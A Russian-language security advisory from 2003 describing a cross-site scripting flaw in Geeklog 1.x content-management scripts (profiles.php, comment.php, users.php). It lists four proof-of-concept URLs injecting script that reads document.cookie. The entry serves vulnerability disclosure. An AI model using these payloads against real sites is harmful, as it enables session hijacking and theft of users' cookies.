Межсайтовый скриптинг в Geeklog

Дата публикации:
17.01.2003
Всего просмотров:
747
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Geeklog 1.x
Описание: Geeklog - система управления Web содержанием. Сценарии 'profiles.php', 'comment.php' и 'users.php' уязвимы к межсайтовому скриптингу из-за недостаточного санирования данных пользователя, представленных в URL параметрах. Пример:
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)
</script>
--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>
alert(document.cookie)</script>
--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<
script>alert(document.cookie)</script>
--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com
&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
Уязвимость обнаружена в Geeklog 1.3.7

Ссылки: Multiple XSS in Geeklog 1.3.7
или введите имя

CAPTCHA